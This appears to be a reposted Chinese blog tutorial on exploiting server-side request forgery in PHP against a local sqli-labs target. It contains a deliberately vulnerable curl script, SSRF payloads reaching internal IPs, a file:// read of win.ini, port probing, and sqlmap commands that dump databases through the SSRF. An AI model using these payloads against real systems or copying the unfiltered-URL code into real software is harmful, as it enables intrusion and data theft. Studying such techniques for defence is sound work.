ssrf漏洞利用

0x00前言发现最近已经很久没更新文章了,这里就先来更新一篇ssrf,这个漏洞也是最近才研究的,以前没有去挖过此类漏洞,对此漏洞的认知也比较少0x01漏洞原理这个漏洞产生是因为服务器向外部去

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

0x00 前言

发现最近已经很久没更新文章了,这里就先来更新一篇ssrf,这个漏洞也是最近才研究的,以前没有去挖过此类漏洞,对此漏洞的认知也比较少

0x01 漏洞原理

这个漏洞产生是因为服务器向外部去请求一些资源,例如图片或者是url的时候就会造成这个漏洞。现在很多网站开发的时候也会请求到外部的一些图片,那么这样也很有可能存在ssrf漏洞。

先来看看产生ssrf漏洞的几个函数。

file_get_contents()
fsockopen()
curl_exec()

 

 

0x02 ssrf 利用

 

在php里面使用者几个函数来请求外部的资源,并且没做限制和过滤的话就会产生这个ssrf漏洞,

这里先来编写一段简单的ssrf代码。

<?php
function curl($url)
{
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_exec($ch);
    curl_close($ch);

}
$url = $_GET['url'];
curl($url);
?>

 

这里请求以get方式接收url传参过来数据。

在正常情况下url可能是这样的

http://127.0.0.1/ssrf1.php?url=https://p2.ssl.qhimgs1.com/t01523800134810ef18.jpg

 

但是我们如果把他请求的链接替换成他内网的地址,就可以让他直接访问内网的80端口。

 

http://127.0.0.1/ssrf1.php?url=http://192.168.0.104

 

 

ssrf漏洞利用

 

 

 

这里可以看到能利用到ssrf漏洞,访问到内部的资源,那么我们是不是可以来尝试一下能不能访问他内网的url进行sql注入,但是这里只会加载部分资源,具体得还得靠字典去扫描。

方便演示,直接搭建了个sqli-labs 的靶机在他访问的内网环境中,用ssrf来请求。

 

http://127.0.0.1/ssrf1.php?url=http://192.168.0.104:8000/Less-1/?id=2%27

 ssrf漏洞利用

 

 

 

这里要注意的一个点是后面输入的payload 要url编码,否则会报错。

 

这里直接使用sqlmap来跑,内网的一些网站大部分防护比较弱。

sqlmap -u "http://127.0.0.1/ssrf1.php?url=http://192.168.0.104:8000/Less-1/?id=1*" --dbs

 ssrf漏洞利用

 

 

 

在这里只检测出来了存在注入,但是缺没有爆出数据,后面输入空格的地方没做编码可能会报错

 ssrf漏洞利用

 

 

 

 

那么我们使用sqlmap的时候可以加上tamper脚本,让空格做个编码或者是替换。

sqlmap -u "http://127.0.0.1/ssrf1.php?url=http://192.168.0.104:8000/Less-1/?id=1*" --dbs --tamper=space2comment

 

 ssrf漏洞利用

 

 

 

这里成功爆出所有数据。

 

ssrf也可以使用一些伪协议来探测内网的ip和端口,这里先使用file协议来读取文件。

 

http://127.0.0.1/ssrf1.php?url=file://c:\\windows\\win.ini

ssrf漏洞利用

 

 

 

 

 

 

成功访问到win.ini文件

这里编写了个脚本使用file协议来使用字典去遍历文件。

 

python.exe ssrf.py http://127.0.0.1/ssrf1.php?url path.txt file

 

这里能直接遍历到文件。让脚本帮我们完成工作,能让我们在渗透当中避免不必要的麻烦。

 

遍历完文件后,还可以用ssrf来遍历端口。

 

http://127.0.0.1/ssrf1.php?url=http://127.0.0.1:3306

ssrf漏洞利用

 

 

 

 

这里可以直接探测到一些banner信息,如果没开放的话,这里是不会返回任何内容的。

那么我们这里肯定也不能使用手工去做探测依然用到我们的脚本。

python ssrf.py http://127.0.0.1/ssrf1.php?url port.txt http

ssrf漏洞利用

 

 

 

 

可以成功探测出本机ip开放的端口以及版本信息,在代码里面默认写的是探测本机的端口,如果想探测其他的内网ip段开放端口的话可以自行修改一下代码中的ip。因为先麻烦所以暂时先把它给固定死。项目的地址也在这里贴出来给各位师傅。

github地址:https://github.com/nice0e3/ssrf

在这里还有个功能没写就是需要遍历内网存活的80端口,后面也会逐渐完善这个脚本。

 

 

0x03 一些小感慨

在这段时间接触脚本开发以来,发现原来会开发安全工具的和不会开发的是两种本质上的区别,从思维上就有很大的区别。不会开发工具的话,话说难听点就是个工具人。但是会开发工具的缺不一样,会开发工具的会是一个开发工具的工具人,哈哈哈。

最近都在完善一些脚本能力,也在逐渐使用脚本来完善一些以前有过的一些大胆的想法。

 

本文章耗时:两小时

 

 ssrf漏洞利用

 

 

 

 

 

 

ssrf漏洞利用

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119966.html原文链接:https://javaforall.net

(0)
上一篇 2021年12月11日 上午8:00
下一篇 2021年12月11日 上午9:00


相关推荐

  • 一款有意思的 Qt 飞行仪表控件

    一款有意思的 Qt 飞行仪表控件最近在网上偶然发现一款 Qt 飞行仪表板控件 真的很酷哦 是一款开源软件 地址 https sourceforge net projects qfi 直接编译运行 美工还是不错的 控件操作非常简单 voidMainWind timerEvent QTimerEvent event

    2026年3月16日
    2
  • 数据库的事务隔离级别总结[通俗易懂]

    数据库的事务隔离级别总结[通俗易懂]学习数据库的时候常常会接触到事务,ACID等概念,那么到底什么是数据库的事务,数据库事务又具有哪些特点,和ACID有怎样的关系,事务的隔离级别又是做什么的呢?。事务及其四大特性?事务(Transaction):访问并可能更新数据库中各种数据项的一个程序执行单元(unit),它通常由高级数据库操纵语言或编程语言(如SQL,C++或Java)书写的用户程序的执行所引起。当在数据库中更改数据成功时…

    2022年5月13日
    57
  • mysql时序性数据库_时序数据库入门[通俗易懂]

    mysql时序性数据库_时序数据库入门[通俗易懂]数据库的模型包含关系型、key-value型、Document型等很多种,那么为什么新型的时序数据库成为监控数据存储的新宠呢?下面就会从为什么需要时序数据库?时序数据库的数据结构两个方面来介绍一下时序数据库。1.为什么需要时序数据库1.1时序数据特点时序数据有如下几个特点:基本上是插入操作较多且无更新的需求数据带有时间属性,且数据量随着时间递增插入数据多,每秒钟插入需要可到达千万甚至是上…

    2022年10月5日
    5
  • 谷歌收购摩托罗拉移动

    谷歌收购摩托罗拉移动明眼人都看得出来 谷歌这是要借助摩托罗拉在手机上的大量专利来震慑某一些竞争对手 警告其不要轻举妄动 起到保护尚在成长当中的 android 系统的目的 谷歌做出这样的举动并不令人吃惊 吃惊的是摩托罗拉做出这样的决策 摩托目前在 android 市场上虽然不是最红火的 但也已经是挺过了最艰难的时刻了 正是收获的季节了 突然这么简单就放手了 确实很有魄力 摩托豪赌 android 系统 当然不希望其这么快被打败

    2026年3月20日
    2
  • 想帮帮即将上线OpenClaw一键免费部署:含Skills安装更省心

    想帮帮即将上线OpenClaw一键免费部署:含Skills安装更省心

    2026年3月14日
    1
  • mybatishelperpro激活码_在线激活

    (mybatishelperpro激活码)最近有小伙伴私信我,问我这边有没有免费的intellijIdea的激活码,然后我将全栈君台教程分享给他了。激活成功之后他一直表示感谢,哈哈~IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.html2K…

    2022年4月1日
    281

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号